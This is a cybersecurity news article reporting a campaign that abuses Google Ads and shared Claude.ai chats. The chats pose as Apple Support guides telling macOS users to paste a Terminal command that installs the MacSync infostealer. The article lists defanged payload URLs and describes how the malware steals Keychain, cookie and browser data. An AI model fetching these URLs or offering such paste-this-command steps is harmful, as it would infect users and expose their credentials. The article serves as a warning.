InfoSecBulletin Cybersecurity for mankind
As AI is advancing unpredictably cyber criminals also change their attack pattern which make challenge for cyber resilience. Attackers are abusing Google Ads and legitimate Claude.ai shared chats in an active advertising campaign.
Users looking for “Claude mac download” might find ads that show claude.ai as the site to visit. However, these can actually lead to steps that put malware on their Mac.
OpenAI unveils its first custom chip, Named Jalapeño
Bajaj Auto System Hit by a Ransomware Attack
Cisco Unified CM flaw CVE-2026-20230 exploited in attacks
LastPass says hackers stole customer data via Klue, supply chain breach
New Apple Exploit Bypasses Boot Defenses, Possibly Affects Millions of iPhones Worldwide
India’s Tata Electronics hit by cyber breach: Hacker target 630 GB record
Anthropic’s Mythos reportedly broke NSA classified systems in hours
OpenAI New Method “Deployment Simulation” Predicts AI Risks Before Deployment
AryStinger botnet infected thousands of D-Link routers globally
Hacker suspected of sending alerts across Brazil
Shared Claude Chats weaponized to target macOS users
The campaign was discovered by Berk Albayrak, a security expert at Trendyol Group, who posted his findings on LinkedIn.
Albayrak found a chat from Claude.ai that claims to be an official guide for “Claude Code on Mac,” saying it’s from “Apple Support.” The chat shows users how to open Terminal and paste a command, which secretly downloads and runs malware on their Mac.
Bleeping Computer reported, to verify Albayrak’s findings, they landed on a second shared Claude chat carrying out the same attack through entirely separate infrastructure.
The two chats follow an identical structure and social engineering approach but use different domains and payloads. Both chats were publicly accessible at the time of writing:
What does the macOS malware do?
The base64 instructions shown in the shared Claude chat download an encoded shell script from domains such as:
In variant seen by Albayrak [VirusTotal]: hxxp://customroofingcontractors[.]com/curl/b42a0ed9d1ecb72e42d6034502c304845d98805481d99cea4e259359f9ab206e
In variant seen by BleepingComputer [VirusTotal]: hxxps://bernasibutuwqu2[.]com/debug/loader.sh?build=a39427f9d5bfda11277f1a58c89b7c2d’
The ‘loader.sh’ (served by the second link above) is another set of Gunzip-compressed shell instructions:
This script runs completely in memory, leaving little clear evidence on the disk.
BleepingComputer saw that the server sent a different hidden version of the payload for each request. This method is called polymorphic delivery. It makes it more difficult for security tools to detect the download using a known hash or signature.
The variant BleepingComputer identified starts by checking whether the machine has Russian or CIS-region keyboard input sources configured. If it does, the script exits without doing anything, sending a quiet cis_blocked status ping to the attacker’s server on its way out. Only machines that pass this check get the next stage:
Before going on, the script gathers the victim’s external IP address, hostname, OS version, and keyboard settings, then sends this information to the attacker. This profiling of the victim before sending the payload shows that the attackers are careful about who they choose to target.
The script downloads a second-stage payload and runs it using osascript, which is macOS’s built-in scripting tool. This allows the attacker to run code from far away without needing to install a usual app or binary.
The type found by Albayrak seems to skip profiling steps. It goes right to execution. It collects browser usernames and passwords, cookies, and macOS Keychain data, puts them together, and sends them to the attacker’s server. Albayrak found out this is a type of the MacSync macOS infostealer:
The briskinternet[.]com domain shown above in the variant identified by Albayrak appeared to be down at the time of writing. Click here to read full report.
